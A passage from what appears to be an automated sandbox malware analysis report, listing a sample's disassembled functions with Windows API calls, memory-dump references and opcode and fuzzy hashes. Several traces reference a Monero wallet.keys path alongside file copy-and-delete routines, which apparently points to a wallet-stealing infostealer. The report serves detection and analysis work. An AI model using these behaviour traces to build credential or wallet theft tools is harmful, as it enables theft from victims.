                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 6673cf06c561d0d1a6337bd7ae052ed8471d35ca76f7ba93ed46e4b6e634b5c9
                              • Instruction ID: 78926d6dbf31ae357fd66aaa829dc88c026af846b8a6c046be219210755ded8c
                              • Opcode Fuzzy Hash: 6673cf06c561d0d1a6337bd7ae052ed8471d35ca76f7ba93ed46e4b6e634b5c9
                              • Instruction Fuzzy Hash: 7A21B8B5D1420CAFCB18EFE4D949AEEB7B5FF48300F04856AE506B3250EB745609CB69
                              Function 00BF7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,009AB9F0,00000000,00020119,?), ref: 00BF7E5E
                              • RegQueryValueExA.ADVAPI32(?,009BDCE0,00000000,00000000,000000FF,000000FF), ref: 00BF7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00BF7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: dee1dd683cdfcd90fa752526e008283d7f54f4f04dab3a77f599b1022374ef66
                              • Instruction ID: 018c86fa5ad8a837702cfc05d066f08ee1f09f02e634e7a67546960098ad366c
                              • Opcode Fuzzy Hash: dee1dd683cdfcd90fa752526e008283d7f54f4f04dab3a77f599b1022374ef66
                              • Instruction Fuzzy Hash: 19116DB1A44209AFD714CB95DD49F7BBBBCEB04710F1041AAF705A7280DB7458098BA1
                              Function 00BF9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(009BE8F8,?,?,?,00BF140C,?,009BE8F8,00000000), ref: 00BF926C
                              • lstrcpyn.KERNEL32(00E2AB88,009BE8F8,009BE8F8,?,00BF140C,?,009BE8F8), ref: 00BF9290
                              • lstrlen.KERNEL32(?,?,00BF140C,?,009BE8F8), ref: 00BF92A7
                              • wsprintfA.USER32 ref: 00BF92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: e24a02f302a9fcb62095cd3e5741c02a6b6e8a60774384eca7af35bf8e1dfc06
                              • Instruction ID: 6382e366ad5bd20132448ea0d816c261e0ef66d243710b445604c94bd09895f8
                              • Opcode Fuzzy Hash: e24a02f302a9fcb62095cd3e5741c02a6b6e8a60774384eca7af35bf8e1dfc06
                              • Instruction Fuzzy Hash: C0011A7550020CFFCB04DFECD988EAE7BB9EB48350F188168F909AB240C631AA45DB91
                              Function 00BE12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BE12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BE12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00BE12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 46f898041863b77dc2c01dc03eb220280f5b0e4e011072ecf8440653801c220d
                              • Instruction ID: 0303e8c5eeb90b57bfcd0e322174f28ef3b65760777813069e2fe090609c41f2
                              • Opcode Fuzzy Hash: 46f898041863b77dc2c01dc03eb220280f5b0e4e011072ecf8440653801c220d
                              • Instruction Fuzzy Hash: B50131B9A40208BFDB18DFE5DC49FAEB7B8FB48701F108169FB05A7280D6719A058F51
                              Function 00BFC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 77a93ec95e87318f01434b690af956b094f8cc25d2abdb9fde95ea2d02653b01
                              • Instruction ID: a89f771fd85e1133196b14662520385ccd9444770b801f30a436d9bedab11a38
                              • Opcode Fuzzy Hash: 77a93ec95e87318f01434b690af956b094f8cc25d2abdb9fde95ea2d02653b01
                              • Instruction Fuzzy Hash: 4541D77150075C5EDB228B24CD84FFBBFE99F45704F1484E8EA8A87182D2719A88DF60
                              Function 00BF6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BF6663
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF6726
                              • ExitProcess.KERNEL32 ref: 00BF6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: c0c6ff3982d74508637a5eed0db50bccc27278644cc0bee96e17ac723481189c
                              • Instruction ID: a9adc6500fb6596487f44e6502bb49a7a8e24f505d32a68570b76133c1253038
                              • Opcode Fuzzy Hash: c0c6ff3982d74508637a5eed0db50bccc27278644cc0bee96e17ac723481189c
                              • Instruction Fuzzy Hash: 1231D8B1801218ABDB18EB50DC95BEEB7B8AF44300F405199F30977191DFB46A4DCF9A
                              Function 00BF87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C00E28,00000000,?), ref: 00BF882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF8836
                              • wsprintfA.USER32 ref: 00BF8850
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: ee7c65fa7b6814321a4b70376c0e72bf71e54042fc39cefb1dd41e1a19755855
                              • Instruction ID: 972bab36d4471da358f9446d6586d20191f1c5ccb108edf6028921756d7a0ffb
                              • Opcode Fuzzy Hash: ee7c65fa7b6814321a4b70376c0e72bf71e54042fc39cefb1dd41e1a19755855
                              • Instruction Fuzzy Hash: 72213DB1A40208AFDB18DF95DD49FAEBBB8FB48701F144169F605B7280C779A905CBA1
                              Function 00BF8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BF951E,00000000), ref: 00BF8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF8D62
                              • wsprintfW.USER32 ref: 00BF8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 0cdb9a9dd3b075daaa6c7e08a7427c077fcc82ecd0af214ee699fd4c668b0264
                              • Instruction ID: cd9922243008cd5eb60b9a5ed7eed345b0b69d43bb6ef8500225046d7a66b523
                              • Opcode Fuzzy Hash: 0cdb9a9dd3b075daaa6c7e08a7427c077fcc82ecd0af214ee699fd4c668b0264
                              • Instruction Fuzzy Hash: E3E08CB0A40208BFD728DB95DC0EE6977B8EB04702F0441A4FE09A7280DA719E058B96
                              Function 00BEA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BEA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00BEA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00BEA6BC
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00BEA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 42413800d67bd619317d92e50e3244fe21b162cc311bb90ef58ebc8d1d8e01de
                              • Instruction ID: 26d76933853d805b8d1e4f45e6922147b0d0a965d3a97e8f29ee8da936738749
                              • Opcode Fuzzy Hash: 42413800d67bd619317d92e50e3244fe21b162cc311bb90ef58ebc8d1d8e01de
                              • Instruction Fuzzy Hash: CAE1C1B281010C9BDB19EBA4DC91EFE73B8AF14340F5481A9F61A77091DF706A4DCB62
                              Function 00BED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BED481
                              • lstrlen.KERNEL32(00000000), ref: 00BED698
                              • lstrlen.KERNEL32(00000000), ref: 00BED6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00BED72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: cd4523fb22056fd83c6b666c01cd7ca1049c178d606a56563aa71118e5e1d10e
                              • Instruction ID: 311906b4cfc406d6704b09ff002f583838551df32305ee2c3439a6b658dd2b98
                              • Opcode Fuzzy Hash: cd4523fb22056fd83c6b666c01cd7ca1049c178d606a56563aa71118e5e1d10e
                              • Instruction Fuzzy Hash: 9391DEB191010C9BDB18EBA4DC96DFE73B8AF14340F5481A9F61A77091EF746A0DCB62
                              Function 00BED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
